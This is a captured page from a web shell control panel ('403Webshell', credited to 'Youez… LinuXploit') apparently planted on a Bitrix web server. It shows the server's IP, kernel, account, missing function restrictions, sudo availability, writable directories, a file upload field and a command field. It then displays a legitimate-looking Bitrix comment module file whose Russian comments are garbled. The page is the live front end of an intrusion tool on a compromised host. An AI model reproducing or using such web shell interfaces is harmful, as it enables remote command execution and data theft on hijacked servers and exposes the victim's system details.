403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/cvetdv.ru/bitrix/modules/burlakastudio.realcommenter/ajax/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/bitrix/ext_www/cvetdv.ru/bitrix/modules/burlakastudio.realcommenter/ajax/ajax_header_init.php
<?php
/**
 * ����� "��������� ����������� D7" ��� �������
 * �������� ���� �����: www.realcommenter.com
 * �������� ���� �����������: burlaka.studio
 * ����� � ����������: ������� ������� (AlexeyGfi) -> alexeygfi@gmail.com
 */

use Bitrix\Main\Context;
use Bitrix\Main\Loader;
use Burlakastudio\Realcommenter\GRANT_AND_ACCESS;
use Burlakastudio\Realcommenter\TOOLS;

set_time_limit(0);
error_reporting(E_ERROR);

define('NO_KEEP_STATISTIC', true); //�� ������ � ����������
define('NOT_CHECK_PERMISSIONS', true);
define('PUBLIC_AJAX_MODE', true); //���� � ������ ������� �� ������ �����

if ($_POST['SITE_ID']) {
    define('SITE_ID', htmlspecialchars($_POST['SITE_ID']));
} else {
    define('SITE_ID', 's1');
}

if ($_POST['LANGUAGE_ID']) {
    define('LANGUAGE_ID', htmlspecialchars($_POST['LANGUAGE_ID']));
} else {
    define('LANGUAGE_ID', 'ru');
}

require($_SERVER['DOCUMENT_ROOT'] . '/bitrix/modules/main/include/prolog_before.php');

@define('ADMIN_SECTION', true);

/**
 * ������� ����� ������ (������ ��� json), ����������
 */
$GLOBALS['APPLICATION']->SetShowIncludeAreas(false);
$_SESSION['SESS_SHOW_TIME_EXEC'] = null;
$_SESSION['SESS_SHOW_INCLUDE_TIME_EXEC'] = null;
$GLOBALS['DB']->ShowSqlStat = false;

Loader::includeModule('burlakastudio.realcommenter');

$request = Context::getCurrent()->getRequest();
$request->addFilter(new \Burlakastudio\Realcommenter\EncodeAjaxParamsHelper);

$server = Context::getCurrent()->getServer();
$posts = $request->getPostList()->toArray();

$bxsessid = $posts['bxsessid'] ?? null;
if ($bxsessid) {
    if (\bitrix_sessid() !== $bxsessid) {
        die('Access denied');
    }
}

$sessClearFlag = 'N';

// /realcommenter/?clear_cache=Y
$referer = Context::getCurrent()->getServer()->get('HTTP_REFERER');
if (strpos($referer, 'clear_cache=Y') !== false) {
    global $USER;
    if (is_object($USER) && $USER->CanDoOperation('cache_control')) {
        $sessClearFlag = 'Y';
    }
}
$_SESSION['SESS_CLEAR_CACHE'] = $sessClearFlag;

$json_return = [];

// �� �����! ���������� ���� �� ����
$access_granted = GRANT_AND_ACCESS::referer_granted_to_domain();

if (!$access_granted) {
    die;
}

Youez - 2016 - github.com/yon3zu
LinuXploit